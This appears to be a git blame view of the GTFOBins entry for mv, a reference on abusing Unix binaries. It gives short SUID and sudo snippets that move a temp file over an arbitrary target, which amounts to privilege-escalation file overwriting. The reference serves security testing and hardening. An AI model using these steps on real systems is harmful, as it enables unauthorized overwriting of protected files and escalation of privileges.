1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-21 03:11:42 +02:00
GTFOBins.github.io/_gtfobins/mv.md

17 lines
391 B
Markdown
Raw Normal View History

2018-09-03 22:38:22 +02:00
---
2018-09-03 22:40:09 +02:00
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
2018-09-03 22:38:22 +02:00
functions:
2018-10-05 19:55:38 +02:00
suid:
2018-09-03 22:38:22 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
./mv $TF $LFILE
2018-10-05 19:55:38 +02:00
sudo:
2018-09-03 22:38:22 +02:00
- code: |
LFILE=file_to_write
TF=$(mktemp)
echo "DATA" > $TF
sudo mv $TF $LFILE
---